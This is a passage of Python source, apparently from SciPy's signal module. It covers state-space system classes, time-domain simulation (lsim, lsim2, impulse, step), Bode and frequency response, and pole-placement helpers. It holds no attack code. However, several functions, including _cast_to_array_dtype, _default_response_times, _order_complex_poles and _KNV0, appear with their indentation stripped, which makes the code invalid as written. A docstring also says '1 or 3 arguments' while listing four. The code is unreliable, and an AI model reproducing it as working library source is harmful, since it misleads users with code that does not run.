    Changing the value of properties that are not part of the
    `StateSpace` system representation (such as `zeros` or `poles`) is very
    inefficient and may lead to numerical inaccuracies. It is better to
    convert to the specific system representation first. For example, call
    ``sys = sys.to_zpk()`` before accessing/changing the zeros, poles or gain.
    Examples
    --------
    >>> from scipy import signal
    >>> a = np.array([[0, 1], [0, 0]])
    >>> b = np.array([[0], [1]])
    >>> c = np.array([[1, 0]])
    >>> d = np.array([[0]])
    >>> sys = signal.StateSpace(a, b, c, d)
    >>> print(sys)
    StateSpaceContinuous(
    array([[0, 1],
           [0, 0]]),
    array([[0],
           [1]]),
    array([[1, 0]]),
    array([[0]]),
    dt: None
    )
    """
    def to_discrete(self, dt, method='zoh', alpha=None):
        """
        Returns the discretized `StateSpace` system.
        Parameters: See `cont2discrete` for details.
        Returns
        -------
        sys: instance of `dlti` and `StateSpace`
        """
        # cont2discrete returns (A, B, C, D, dt); drop the trailing dt with
        # [:-1] and pass it explicitly so StateSpace.__new__ dispatches to
        # the discrete subclass.
        return StateSpace(*cont2discrete((self.A, self.B, self.C, self.D),
                                         dt,
                                         method=method,
                                         alpha=alpha)[:-1],
                          dt=dt)
class StateSpaceDiscrete(StateSpace, dlti):
    r"""
    Discrete-time Linear Time Invariant system in state-space form.
    Represents the system as the discrete-time difference equation
    :math:`x[k+1] = A x[k] + B u[k]`.
    `StateSpace` systems inherit additional functionality from the `dlti`
    class.
    Parameters
    ----------
    *system: arguments
        The `StateSpace` class can be instantiated with 1 or 3 arguments.
        The following gives the number of input arguments and their
        interpretation:
            * 1: `dlti` system: (`StateSpace`, `TransferFunction` or
              `ZerosPolesGain`)
            * 4: array_like: (A, B, C, D)
    dt: float, optional
        Sampling time [s] of the discrete-time systems. Defaults to `True`
        (unspecified sampling time). Must be specified as a keyword argument,
        for example, ``dt=0.1``.
    See Also
    --------
    TransferFunction, ZerosPolesGain, dlti
    ss2zpk, ss2tf, zpk2sos
    Notes
    -----
    Changing the value of properties that are not part of the
    `StateSpace` system representation (such as `zeros` or `poles`) is very
    inefficient and may lead to numerical inaccuracies. It is better to
    convert to the specific system representation first. For example, call
    ``sys = sys.to_zpk()`` before accessing/changing the zeros, poles or gain.
    Examples
    --------
    >>> from scipy import signal
    >>> a = np.array([[1, 0.1], [0, 1]])
    >>> b = np.array([[0.005], [0.1]])
    >>> c = np.array([[1, 0]])
    >>> d = np.array([[0]])
    >>> signal.StateSpace(a, b, c, d, dt=0.1)
    StateSpaceDiscrete(
    array([[ 1. ,  0.1],
           [ 0. ,  1. ]]),
    array([[ 0.005],
           [ 0.1  ]]),
    array([[1, 0]]),
    array([[0]]),
    dt: 0.1
    )
    """
    # All behavior is inherited; this subclass only fixes the lti/dlti
    # parentage chosen by StateSpace.__new__.
    pass
def lsim2(system, U=None, T=None, X0=None, **kwargs):
    """
    Simulate output of a continuous-time linear system, by using
    the ODE solver `scipy.integrate.odeint`.
    Parameters
    ----------
    system : an instance of the `lti` class or a tuple describing the system.
        The following gives the number of elements in the tuple and
        the interpretation:
        * 1: (instance of `lti`)
        * 2: (num, den)
        * 3: (zeros, poles, gain)
        * 4: (A, B, C, D)
    U : array_like (1D or 2D), optional
        An input array describing the input at each time T. Linear
        interpolation is used between given times. If there are
        multiple inputs, then each column of the rank-2 array
        represents an input. If U is not given, the input is assumed
        to be zero.
    T : array_like (1D or 2D), optional
        The time steps at which the input is defined and at which the
        output is desired. The default is 101 evenly spaced points on
        the interval [0,10.0].
    X0 : array_like (1D), optional
        The initial condition of the state vector. If `X0` is not
        given, the initial conditions are assumed to be 0.
    kwargs : dict
        Additional keyword arguments are passed on to the function
        `odeint`. See the notes below for more details.
    Returns
    -------
    T : 1D ndarray
        The time values for the output.
    yout : ndarray
        The response of the system.
    xout : ndarray
        The time-evolution of the state-vector.
    Notes
    -----
    This function uses `scipy.integrate.odeint` to solve the
    system's differential equations. Additional keyword arguments
    given to `lsim2` are passed on to `odeint`. See the documentation
    for `scipy.integrate.odeint` for the full list of arguments.
    If (num, den) is passed in for ``system``, coefficients for both the
    numerator and denominator should be specified in descending exponent
    order (e.g. ``s^2 + 3s + 5`` would be represented as ``[1, 3, 5]``).
    """
    # Normalize `system` to a StateSpace instance; reject discrete systems.
    if isinstance(system, lti):
        sys = system._as_ss()
    elif isinstance(system, dlti):
        raise AttributeError('lsim2 can only be used with continuous-time '
                             'systems.')
    else:
        sys = lti(*system)._as_ss()
    if X0 is None:
        # Zero initial state, matching the state dimension (rows of B).
        X0 = zeros(sys.B.shape[0], sys.A.dtype)
    if T is None:
        # XXX T should really be a required argument, but U was
        # changed from a required positional argument to a keyword,
        # and T is after U in the argument list. So we either: change
        # the API and move T in front of U; check here for T being
        # None and raise an exception; or assign a default value to T
        # here. This code implements the latter.
        T = linspace(0, 10.0, 101)
    T = atleast_1d(T)
    if len(T.shape) != 1:
        raise ValueError("T must be a rank-1 array.")
    if U is not None:
        U = atleast_1d(U)
        if len(U.shape) == 1:
            # Single input given as a flat array: make it a column.
            U = U.reshape(-1, 1)
        sU = U.shape
        if sU[0] != len(T):
            raise ValueError("U must have the same number of rows "
                             "as elements in T.")
        if sU[1] != sys.inputs:
            raise ValueError("The number of inputs in U (%d) is not "
                             "compatible with the number of system "
                             "inputs (%d)" % (sU[1], sys.inputs))
        # Create a callable that uses linear interpolation to
        # calculate the input at any time.
        ufunc = interpolate.interp1d(T, U, kind='linear',
                                     axis=0, bounds_error=False)
        def fprime(x, t, sys, ufunc):
            """The vector field of the linear system."""
            # nan_to_num guards against NaN from interp1d outside [T0, Tn].
            return dot(sys.A, x) + squeeze(dot(sys.B, nan_to_num(ufunc([t]))))
        xout = integrate.odeint(fprime, X0, T, args=(sys, ufunc), **kwargs)
        # y = C x + D u, evaluated for all time steps at once.
        yout = dot(sys.C, transpose(xout)) + dot(sys.D, transpose(U))
    else:
        # No input: the homogeneous system x' = A x.
        def fprime(x, t, sys):
            """The vector field of the linear system."""
            return dot(sys.A, x)
        xout = integrate.odeint(fprime, X0, T, args=(sys,), **kwargs)
        yout = dot(sys.C, transpose(xout))
    return T, squeeze(transpose(yout)), xout
def _cast_to_array_dtype(in1, in2):
"""Cast array to dtype of other array, while avoiding ComplexWarning.
Those can be raised when casting complex to real.
"""
if numpy.issubdtype(in2.dtype, numpy.float):
# dtype to cast to is not complex, so use .real
in1 = in1.real.astype(in2.dtype)
else:
in1 = in1.astype(in2.dtype)
return in1
def lsim(system, U, T, X0=None, interp=True):
    """
    Simulate output of a continuous-time linear system.
    Parameters
    ----------
    system : an instance of the LTI class or a tuple describing the system.
        The following gives the number of elements in the tuple and
        the interpretation:
        * 1: (instance of `lti`)
        * 2: (num, den)
        * 3: (zeros, poles, gain)
        * 4: (A, B, C, D)
    U : array_like
        An input array describing the input at each time `T`
        (interpolation is assumed between given times). If there are
        multiple inputs, then each column of the rank-2 array
        represents an input. If U = 0 or None, a zero input is used.
    T : array_like
        The time steps at which the input is defined and at which the
        output is desired. Must be nonnegative, increasing, and equally spaced.
    X0 : array_like, optional
        The initial conditions on the state vector (zero by default).
    interp : bool, optional
        Whether to use linear (True, the default) or zero-order-hold (False)
        interpolation for the input array.
    Returns
    -------
    T : 1D ndarray
        Time values for the output.
    yout : 1D ndarray
        System response.
    xout : ndarray
        Time evolution of the state vector.
    Notes
    -----
    If (num, den) is passed in for ``system``, coefficients for both the
    numerator and denominator should be specified in descending exponent
    order (e.g. ``s^2 + 3s + 5`` would be represented as ``[1, 3, 5]``).
    Examples
    --------
    Simulate a double integrator y'' = u, with a constant input u = 1
    >>> from scipy import signal
    >>> system = signal.lti([[0., 1.], [0., 0.]], [[0.], [1.]], [[1., 0.]], 0.)
    >>> t = np.linspace(0, 5)
    >>> u = np.ones_like(t)
    >>> tout, y, x = signal.lsim(system, u, t)
    >>> import matplotlib.pyplot as plt
    >>> plt.plot(t, y)
    """
    # Normalize `system` to a StateSpace instance; reject discrete systems.
    if isinstance(system, lti):
        sys = system._as_ss()
    elif isinstance(system, dlti):
        raise AttributeError('lsim can only be used with continuous-time '
                             'systems.')
    else:
        sys = lti(*system)._as_ss()
    T = atleast_1d(T)
    if len(T.shape) != 1:
        raise ValueError("T must be a rank-1 array.")
    A, B, C, D = map(np.asarray, (sys.A, sys.B, sys.C, sys.D))
    n_states = A.shape[0]
    n_inputs = B.shape[1]
    n_steps = T.size
    if X0 is None:
        X0 = zeros(n_states, sys.A.dtype)
    xout = zeros((n_steps, n_states), sys.A.dtype)
    if T[0] == 0:
        xout[0] = X0
    elif T[0] > 0:
        # step forward to initial time, with zero input
        xout[0] = dot(X0, linalg.expm(transpose(A) * T[0]))
    else:
        raise ValueError("Initial time must be nonnegative")
    no_input = (U is None or
                (isinstance(U, (int, float)) and U == 0.) or
                not np.any(U))
    if n_steps == 1:
        # Single time point: no propagation needed, just the output map.
        yout = squeeze(dot(xout, transpose(C)))
        if not no_input:
            yout += squeeze(dot(U, transpose(D)))
        return T, squeeze(yout), squeeze(xout)
    dt = T[1] - T[0]
    if not np.allclose((T[1:] - T[:-1]) / dt, 1.0):
        warnings.warn("Non-uniform timesteps are deprecated. Results may be "
                      "slow and/or inaccurate.", DeprecationWarning)
        return lsim2(system, U, T, X0)
    if no_input:
        # Zero input: just use matrix exponential
        # take transpose because state is a row vector
        expAT_dt = linalg.expm(transpose(A) * dt)
        # NOTE: was `xrange` (Python 2 only); `range` is equivalent here.
        for i in range(1, n_steps):
            xout[i] = dot(xout[i-1], expAT_dt)
        yout = squeeze(dot(xout, transpose(C)))
        return T, squeeze(yout), squeeze(xout)
    # Nonzero input
    U = atleast_1d(U)
    if U.ndim == 1:
        U = U[:, np.newaxis]
    if U.shape[0] != n_steps:
        raise ValueError("U must have the same number of rows "
                         "as elements in T.")
    if U.shape[1] != n_inputs:
        raise ValueError("System does not define that many inputs.")
    if not interp:
        # Zero-order hold
        # Algorithm: to integrate from time 0 to time dt, we solve
        #   xdot = A x + B u,  x(0) = x0
        #   udot = 0,          u(0) = u0.
        #
        # Solution is
        #   [ x(dt) ]       [ A*dt  B*dt ] [ x0 ]
        #   [ u(dt) ] = exp [  0     0   ] [ u0 ]
        M = np.vstack([np.hstack([A * dt, B * dt]),
                       np.zeros((n_inputs, n_states + n_inputs))])
        # transpose everything because the state and input are row vectors
        expMT = linalg.expm(transpose(M))
        Ad = expMT[:n_states, :n_states]
        Bd = expMT[n_states:, :n_states]
        for i in range(1, n_steps):
            xout[i] = dot(xout[i-1], Ad) + dot(U[i-1], Bd)
    else:
        # Linear interpolation between steps
        # Algorithm: to integrate from time 0 to time dt, with linear
        # interpolation between inputs u(0) = u0 and u(dt) = u1, we solve
        #   xdot = A x + B u,        x(0) = x0
        #   udot = (u1 - u0) / dt,   u(0) = u0.
        #
        # Solution is
        #   [ x(dt) ]       [ A*dt  B*dt  0 ] [  x0   ]
        #   [ u(dt) ] = exp [  0     0    I ] [  u0   ]
        #   [u1 - u0]       [  0     0    0 ] [u1 - u0]
        M = np.vstack([np.hstack([A * dt, B * dt,
                                  np.zeros((n_states, n_inputs))]),
                       np.hstack([np.zeros((n_inputs, n_states + n_inputs)),
                                  np.identity(n_inputs)]),
                       np.zeros((n_inputs, n_states + 2 * n_inputs))])
        expMT = linalg.expm(transpose(M))
        Ad = expMT[:n_states, :n_states]
        Bd1 = expMT[n_states+n_inputs:, :n_states]
        Bd0 = expMT[n_states:n_states + n_inputs, :n_states] - Bd1
        for i in range(1, n_steps):
            xout[i] = (dot(xout[i-1], Ad) + dot(U[i-1], Bd0) + dot(U[i], Bd1))
    # y = C x + D u for all steps at once.
    yout = (squeeze(dot(xout, transpose(C))) + squeeze(dot(U, transpose(D))))
    return T, squeeze(yout), squeeze(xout)
def _default_response_times(A, n):
"""Compute a reasonable set of time samples for the response time.
This function is used by `impulse`, `impulse2`, `step` and `step2`
to compute the response time when the `T` argument to the function
is None.
Parameters
----------
A : array_like
The system matrix, which is square.
n : int
The number of time samples to generate.
Returns
-------
t : ndarray
The 1-D array of length `n` of time samples at which the response
is to be computed.
"""
# Create a reasonable time interval.
# TODO: This could use some more work.
# For example, what is expected when the system is unstable?
vals = linalg.eigvals(A)
r = min(abs(real(vals)))
if r == 0.0:
r = 1.0
tc = 1.0 / r
t = linspace(0.0, 7 * tc, n)
return t
def impulse(system, X0=None, T=None, N=None):
    """Impulse response of continuous-time system.

    Parameters
    ----------
    system : an instance of the LTI class or a tuple of array_like
        describing the system.
        The following gives the number of elements in the tuple and
        the interpretation:
        * 1 (instance of `lti`)
        * 2 (num, den)
        * 3 (zeros, poles, gain)
        * 4 (A, B, C, D)
    X0 : array_like, optional
        Initial state-vector. Defaults to zero.
    T : array_like, optional
        Time points. Computed if not given.
    N : int, optional
        The number of time points to compute (if `T` is not given).

    Returns
    -------
    T : ndarray
        A 1-D array of time points.
    yout : ndarray
        A 1-D array containing the impulse response of the system (except for
        singularities at zero).

    Notes
    -----
    If (num, den) is passed in for ``system``, coefficients for both the
    numerator and denominator should be specified in descending exponent
    order (e.g. ``s^2 + 3s + 5`` would be represented as ``[1, 3, 5]``).
    """
    if isinstance(system, lti):
        sys = system._as_ss()
    elif isinstance(system, dlti):
        raise AttributeError('impulse can only be used with continuous-time '
                             'systems.')
    else:
        sys = lti(*system)._as_ss()
    # An impulse at t=0 is equivalent to starting the zero-input system
    # from the initial state B (plus any user-supplied X0).
    X = squeeze(sys.B if X0 is None else sys.B + X0)
    N = 100 if N is None else N
    T = _default_response_times(sys.A, N) if T is None else asarray(T)
    _, h, _ = lsim(sys, 0., T, X, interp=False)
    return T, h
def impulse2(system, X0=None, T=None, N=None, **kwargs):
    """
    Impulse response of a single-input, continuous-time linear system.

    Parameters
    ----------
    system : an instance of the LTI class or a tuple of array_like
        describing the system.
        The following gives the number of elements in the tuple and
        the interpretation:
        * 1 (instance of `lti`)
        * 2 (num, den)
        * 3 (zeros, poles, gain)
        * 4 (A, B, C, D)
    X0 : 1-D array_like, optional
        The initial condition of the state vector. Default: 0 (the
        zero vector).
    T : 1-D array_like, optional
        The time steps at which the input is defined and at which the
        output is desired. If `T` is not given, the function will
        generate a set of time samples automatically.
    N : int, optional
        Number of time points to compute. Default: 100.
    kwargs : various types
        Additional keyword arguments are passed on to the function
        `scipy.signal.lsim2`, which in turn passes them on to
        `scipy.integrate.odeint`; see the latter's documentation for
        information about these arguments.

    Returns
    -------
    T : ndarray
        The time values for the output.
    yout : ndarray
        The output response of the system.

    See Also
    --------
    impulse, lsim2, integrate.odeint

    Notes
    -----
    The solution is generated by calling `scipy.signal.lsim2`, which uses
    the differential equation solver `scipy.integrate.odeint`.
    If (num, den) is passed in for ``system``, coefficients for both the
    numerator and denominator should be specified in descending exponent
    order (e.g. ``s^2 + 3s + 5`` would be represented as ``[1, 3, 5]``).

    .. versionadded:: 0.8.0

    Examples
    --------
    Second order system with a repeated root: x''(t) + 2*x(t) + x(t) = u(t)

    >>> from scipy import signal
    >>> system = ([1.0], [1.0, 2.0, 1.0])
    >>> t, y = signal.impulse2(system)
    >>> import matplotlib.pyplot as plt
    >>> plt.plot(t, y)
    """
    if isinstance(system, lti):
        sys = system._as_ss()
    elif isinstance(system, dlti):
        raise AttributeError('impulse2 can only be used with continuous-time '
                             'systems.')
    else:
        sys = lti(*system)._as_ss()
    b = sys.B
    if b.shape[-1] != 1:
        raise ValueError("impulse2() requires a single-input system.")
    b = b.squeeze()
    if N is None:
        N = 100
    if T is None:
        T = _default_response_times(sys.A, N)
    # Move the impulse in the input to the initial conditions
    # (x(0) = B + X0), then solve the zero-input problem with lsim2().
    ic = b + (zeros_like(b) if X0 is None else X0)
    T_out, yout, _ = lsim2(sys, T=T, X0=ic, **kwargs)
    return T_out, yout
def step(system, X0=None, T=None, N=None):
    """Step response of continuous-time system.

    Parameters
    ----------
    system : an instance of the LTI class or a tuple of array_like
        describing the system.
        The following gives the number of elements in the tuple and
        the interpretation:
        * 1 (instance of `lti`)
        * 2 (num, den)
        * 3 (zeros, poles, gain)
        * 4 (A, B, C, D)
    X0 : array_like, optional
        Initial state-vector (default is zero).
    T : array_like, optional
        Time points (computed if not given).
    N : int, optional
        Number of time points to compute if `T` is not given.

    Returns
    -------
    T : 1D ndarray
        Output time points.
    yout : 1D ndarray
        Step response of system.

    See also
    --------
    scipy.signal.step2

    Notes
    -----
    If (num, den) is passed in for ``system``, coefficients for both the
    numerator and denominator should be specified in descending exponent
    order (e.g. ``s^2 + 3s + 5`` would be represented as ``[1, 3, 5]``).
    """
    if isinstance(system, lti):
        sys = system._as_ss()
    elif isinstance(system, dlti):
        raise AttributeError('step can only be used with continuous-time '
                             'systems.')
    else:
        sys = lti(*system)._as_ss()
    N = 100 if N is None else N
    T = _default_response_times(sys.A, N) if T is None else asarray(T)
    # A unit-step input: ones at every time sample, in the system's dtype.
    U = ones(T.shape, sys.A.dtype)
    T_out, yout, _ = lsim(sys, U, T, X0=X0, interp=False)
    return T_out, yout
def step2(system, X0=None, T=None, N=None, **kwargs):
    """Step response of continuous-time system.

    This function is functionally the same as `scipy.signal.step`, but
    it uses the function `scipy.signal.lsim2` to compute the step
    response.

    Parameters
    ----------
    system : an instance of the LTI class or a tuple of array_like
        describing the system.
        The following gives the number of elements in the tuple and
        the interpretation:
        * 1 (instance of `lti`)
        * 2 (num, den)
        * 3 (zeros, poles, gain)
        * 4 (A, B, C, D)
    X0 : array_like, optional
        Initial state-vector (default is zero).
    T : array_like, optional
        Time points (computed if not given).
    N : int, optional
        Number of time points to compute if `T` is not given.
    kwargs : various types
        Additional keyword arguments are passed on the function
        `scipy.signal.lsim2`, which in turn passes them on to
        `scipy.integrate.odeint`. See the documentation for
        `scipy.integrate.odeint` for information about these arguments.

    Returns
    -------
    T : 1D ndarray
        Output time points.
    yout : 1D ndarray
        Step response of system.

    See also
    --------
    scipy.signal.step

    Notes
    -----
    If (num, den) is passed in for ``system``, coefficients for both the
    numerator and denominator should be specified in descending exponent
    order (e.g. ``s^2 + 3s + 5`` would be represented as ``[1, 3, 5]``).

    .. versionadded:: 0.8.0
    """
    if isinstance(system, lti):
        sys = system._as_ss()
    elif isinstance(system, dlti):
        raise AttributeError('step2 can only be used with continuous-time '
                             'systems.')
    else:
        sys = lti(*system)._as_ss()
    N = 100 if N is None else N
    T = _default_response_times(sys.A, N) if T is None else asarray(T)
    # A unit-step input: ones at every time sample, in the system's dtype.
    U = ones(T.shape, sys.A.dtype)
    T_out, yout, _ = lsim2(sys, U, T, X0=X0, **kwargs)
    return T_out, yout
def bode(system, w=None, n=100):
    """
    Calculate Bode magnitude and phase data of a continuous-time system.

    Parameters
    ----------
    system : an instance of the LTI class or a tuple describing the system.
        The following gives the number of elements in the tuple and
        the interpretation:
        * 1 (instance of `lti`)
        * 2 (num, den)
        * 3 (zeros, poles, gain)
        * 4 (A, B, C, D)
    w : array_like, optional
        Array of frequencies (in rad/s). Magnitude and phase data is calculated
        for every value in this array. If not given a reasonable set will be
        calculated.
    n : int, optional
        Number of frequency points to compute if `w` is not given. The `n`
        frequencies are logarithmically spaced in an interval chosen to
        include the influence of the poles and zeros of the system.

    Returns
    -------
    w : 1D ndarray
        Frequency array [rad/s]
    mag : 1D ndarray
        Magnitude array [dB]
    phase : 1D ndarray
        Phase array [deg]

    Notes
    -----
    If (num, den) is passed in for ``system``, coefficients for both the
    numerator and denominator should be specified in descending exponent
    order (e.g. ``s^2 + 3s + 5`` would be represented as ``[1, 3, 5]``).

    .. versionadded:: 0.11.0

    Examples
    --------
    >>> from scipy import signal
    >>> import matplotlib.pyplot as plt
    >>> sys = signal.TransferFunction([1], [1, 1])
    >>> w, mag, phase = signal.bode(sys)
    >>> plt.figure()
    >>> plt.semilogx(w, mag)    # Bode magnitude plot
    >>> plt.figure()
    >>> plt.semilogx(w, phase)  # Bode phase plot
    >>> plt.show()
    """
    # Complex frequency response; all the work happens in freqresp().
    w, y = freqresp(system, w=w, n=n)
    # Magnitude in decibels.
    mag = 20.0 * numpy.log10(abs(y))
    # Phase in degrees, unwrapped to avoid 2*pi jumps.
    phase = numpy.unwrap(numpy.angle(y)) * 180.0 / numpy.pi
    return w, mag, phase
def freqresp(system, w=None, n=10000):
    """Calculate the frequency response of a continuous-time system.

    Parameters
    ----------
    system : an instance of the `lti` class or a tuple describing the system.
        The following gives the number of elements in the tuple and
        the interpretation:
        * 1 (instance of `lti`)
        * 2 (num, den)
        * 3 (zeros, poles, gain)
        * 4 (A, B, C, D)
    w : array_like, optional
        Array of frequencies (in rad/s). Magnitude and phase data is
        calculated for every value in this array. If not given, a reasonable
        set will be calculated.
    n : int, optional
        Number of frequency points to compute if `w` is not given. The `n`
        frequencies are logarithmically spaced in an interval chosen to
        include the influence of the poles and zeros of the system.

    Returns
    -------
    w : 1D ndarray
        Frequency array [rad/s]
    H : 1D ndarray
        Array of complex magnitude values

    Notes
    -----
    If (num, den) is passed in for ``system``, coefficients for both the
    numerator and denominator should be specified in descending exponent
    order (e.g. ``s^2 + 3s + 5`` would be represented as ``[1, 3, 5]``).

    Examples
    --------
    Generating the Nyquist plot of a transfer function

    >>> from scipy import signal
    >>> import matplotlib.pyplot as plt

    Transfer function: H(s) = 5 / (s-1)^3

    >>> s1 = signal.ZerosPolesGain([], [1, 1, 1], [5])
    >>> w, H = signal.freqresp(s1)
    >>> plt.figure()
    >>> plt.plot(H.real, H.imag, "b")
    >>> plt.plot(H.real, -H.imag, "r")
    >>> plt.show()
    """
    # Normalize `system` to either a TransferFunction or a ZerosPolesGain;
    # anything else (e.g. StateSpace) is converted to zpk form.
    if isinstance(system, lti):
        if isinstance(system, (TransferFunction, ZerosPolesGain)):
            sys = system
        else:
            sys = system._as_zpk()
    elif isinstance(system, dlti):
        raise AttributeError('freqresp can only be used with continuous-time '
                             'systems.')
    else:
        sys = lti(*system)._as_zpk()

    if sys.inputs != 1 or sys.outputs != 1:
        raise ValueError("freqresp() requires a SISO (single input, single "
                         "output) system.")

    # freqs()/freqs_zpk() accept either an explicit frequency array or a
    # point count via the same `worN` argument.
    worN = n if w is None else w
    if isinstance(sys, TransferFunction):
        # sys.num may be a 2-D array with a single row; ravel() makes it
        # 1-D as freqs() expects.
        w, h = freqs(sys.num.ravel(), sys.den, worN=worN)
    elif isinstance(sys, ZerosPolesGain):
        w, h = freqs_zpk(sys.zeros, sys.poles, sys.gain, worN=worN)
    return w, h
# This class will be used by place_poles to return its results
# see http://code.activestate.com/recipes/52308/
class Bunch:
    """Simple attribute container used by `place_poles` to return results.

    Every keyword argument passed to the constructor becomes an instance
    attribute (see http://code.activestate.com/recipes/52308/).
    """
    def __init__(self, **kwds):
        for name, value in kwds.items():
            setattr(self, name, value)
def _valid_inputs(A, B, poles, method, rtol, maxiter):
    """
    Validate the arguments of `place_poles`.

    Checks that the poles come in complex conjugate pairs, that the shapes
    of ``A``, ``B`` and ``poles`` are compatible, and that the chosen method
    supports the requested poles.  Returns the update loop to use and the
    poles reordered as required by the YT algorithm.
    """
    poles = np.asarray(poles)
    if poles.ndim > 1:
        raise ValueError("Poles must be a 1D array like.")
    # _order_complex_poles raises ValueError when a complex pole is given
    # without its conjugate.
    poles = _order_complex_poles(poles)
    if A.ndim > 2:
        raise ValueError("A must be a 2D array/matrix.")
    if B.ndim > 2:
        raise ValueError("B must be a 2D array/matrix")
    if A.shape[0] != A.shape[1]:
        raise ValueError("A must be square")
    if len(poles) > A.shape[0]:
        raise ValueError("maximum number of poles is %d but you asked for %d" %
                         (A.shape[0], len(poles)))
    if len(poles) < A.shape[0]:
        raise ValueError("number of poles is %d but you should provide %d" %
                         (len(poles), A.shape[0]))
    rank_B = np.linalg.matrix_rank(B)
    # A pole repeated more than rank(B) times cannot be placed.
    for pole in poles:
        if sum(pole == poles) > rank_B:
            raise ValueError("at least one of the requested pole is repeated "
                             "more than rank(B) times")

    # Pick the update method; KNV0 cannot handle complex poles.
    if method not in ('KNV0', 'YT'):
        raise ValueError("The method keyword must be one of 'YT' or 'KNV0'")
    if method == "KNV0":
        update_loop = _KNV0_loop
        if not all(np.isreal(poles)):
            raise ValueError("Complex poles are not supported by KNV0")
    else:
        update_loop = _YT_loop

    if maxiter < 1:
        raise ValueError("maxiter must be at least equal to 1")

    # rtol <= 0 is deliberately allowed: a negative rtol forces maxiter
    # iterations.
    if rtol > 1:
        raise ValueError("rtol can not be greater than 1")

    return update_loop, poles
def _order_complex_poles(poles):
"""
Check we have complex conjugates pairs and reorder P according to YT, ie
real_poles, complex_i, conjugate complex_i, ....
The lexicographic sort on the complex poles is added to help the user to
compare sets of poles.
"""
ordered_poles = np.sort(poles[np.isreal(poles)])
im_poles = []
for p in np.sort(poles[np.imag(poles) < 0]):
if np.conj(p) in poles:
im_poles.extend((p, np.conj(p)))
ordered_poles = np.hstack((ordered_poles, im_poles))
if poles.shape[0] != len(ordered_poles):
raise ValueError("Complex poles must come with their conjugates")
return ordered_poles
def _KNV0(B, ker_pole, transfer_matrix, j, poles):
"""
Algorithm "KNV0" Kautsky et Al. Robust pole
assignment in linear state feedback, Int journal of Control
1985, vol 41 p 1129->1155
http://la.epfl.ch/files/content/sites/la/files/
users/105941/public/KautskyNicholsDooren
"""
# Remove xj form the base
transfer_matrix_not_j = np.delete(transfer_matrix, j, axis=1)
# If we QR this matrix in full mode Q=Q0|Q1
# then Q1 will be a single column orthogonnal to
# Q0, that's what we are looking for !
# After merge of gh-4249 great speed improvements could be achieved
# using QR updates instead of full QR in the line below
# To debug with numpy qr uncomment the line below
# Q, R = np.linalg.qr(transfer_matrix_not_j, mode="complete")
Q, R = s_qr(transfer_matrix_not_j, mode="full")
mat_ker_pj = np.dot(ker_pole[j], ker_pole[j].T)
yj = np.dot(mat_ker_pj, Q[:, -1])
# If Q[:, -1] is "almost" orthogonal to ker_pole[j] its
# projection into ker_pole[j] will yield a vector
# close to 0. As we are looking for a vector in ker_pole[j]
# simply stick with transfer_matrix[:, j] (unless someone provides me with
# a better choice ?)
if not np.allclose(yj, 0):
xj = yj/np.linalg.norm(yj)
transfer_matrix[:, j] = xj
# KNV does not support complex poles, using YT technique the two lines
# below seem to work 9 out of 10 times but it is not reliable enough:
# transfer_matrix[:, j]=real(xj)
# transfer_matrix[:, j+1]=imag(xj)
# Add this at the beginning of this function if you wish to test
# complex support:
# if ~np.isreal(P[j]) and (j>=B.shape[0]-1 or P[j]!=np.conj(P[j+1])):
# return
# Problems arise when imag(xj)=>0 I have no idea on how to fix this
def _YT_real(ker_pole, Q, transfer_matrix, i, j):
    """
    Applies algorithm from YT section 6.1 page 19 related to real pairs

    Updates columns ``i`` and ``j`` of ``transfer_matrix`` in place with a
    rank-2 update.  The last two columns of ``Q`` span the orthogonal
    complement of the other columns of ``transfer_matrix``.
    """
    # step 1 page 19
    u = Q[:, -2, np.newaxis]
    v = Q[:, -1, np.newaxis]

    # step 2 page 19
    m = np.dot(np.dot(ker_pole[i].T, np.dot(u, v.T) -
               np.dot(v, u.T)), ker_pole[j])

    # step 3 page 19
    um, sm, vm = np.linalg.svd(m)
    # mu1, mu2 two first columns of U => 2 first lines of U.T
    mu1, mu2 = um.T[:2, :, np.newaxis]
    # VM is V.T with numpy we want the first two lines of V.T
    nu1, nu2 = vm[:2, :, np.newaxis]

    # what follows is a rough python translation of the formulas
    # in section 6.2 page 20 (step 4)
    transfer_matrix_j_mo_transfer_matrix_j = np.vstack((
            transfer_matrix[:, i, np.newaxis],
            transfer_matrix[:, j, np.newaxis]))

    # Generic case: distinct singular values — a single direction per
    # kernel is enough.  Degenerate case (sm[0] ~= sm[1]): use both
    # singular directions via a block-diagonal kernel matrix.
    if not np.allclose(sm[0], sm[1]):
        ker_pole_imo_mu1 = np.dot(ker_pole[i], mu1)
        ker_pole_i_nu1 = np.dot(ker_pole[j], nu1)
        ker_pole_mu_nu = np.vstack((ker_pole_imo_mu1, ker_pole_i_nu1))
    else:
        ker_pole_ij = np.vstack((
                                np.hstack((ker_pole[i],
                                           np.zeros(ker_pole[i].shape))),
                                np.hstack((np.zeros(ker_pole[j].shape),
                                                    ker_pole[j]))
                                ))
        mu_nu_matrix = np.vstack(
            (np.hstack((mu1, mu2)), np.hstack((nu1, nu2)))
            )
        ker_pole_mu_nu = np.dot(ker_pole_ij, mu_nu_matrix)
    transfer_matrix_ij = np.dot(np.dot(ker_pole_mu_nu, ker_pole_mu_nu.T),
                                transfer_matrix_j_mo_transfer_matrix_j)
    if not np.allclose(transfer_matrix_ij, 0):
        transfer_matrix_ij = (np.sqrt(2)*transfer_matrix_ij /
                              np.linalg.norm(transfer_matrix_ij))
        transfer_matrix[:, i] = transfer_matrix_ij[
            :transfer_matrix[:, i].shape[0], 0
            ]
        transfer_matrix[:, j] = transfer_matrix_ij[
            transfer_matrix[:, i].shape[0]:, 0
            ]
    else:
        # As in knv0 if transfer_matrix_j_mo_transfer_matrix_j is orthogonal
        # to Vect{ker_pole_mu_nu} assign transfer_matrixi/transfer_matrix_j
        # to ker_pole_mu_nu and iterate. As we are looking for a vector in
        # Vect{Matker_pole_MU_NU} (see section 6.1 page 19) this might help
        # (that's a guess, not a claim !)
        transfer_matrix[:, i] = ker_pole_mu_nu[
            :transfer_matrix[:, i].shape[0], 0
            ]
        transfer_matrix[:, j] = ker_pole_mu_nu[
            transfer_matrix[:, i].shape[0]:, 0
            ]
def _YT_complex(ker_pole, Q, transfer_matrix, i, j):
    """
    Applies algorithm from YT section 6.2 page 20 related to complex pairs

    Updates columns ``i`` (real part) and ``j`` (imaginary part) of
    ``transfer_matrix`` in place for one complex conjugate pair of poles.
    """
    # step 1 page 20
    ur = np.sqrt(2)*Q[:, -2, np.newaxis]
    ui = np.sqrt(2)*Q[:, -1, np.newaxis]
    u = ur + 1j*ui

    # step 2 page 20
    ker_pole_ij = ker_pole[i]
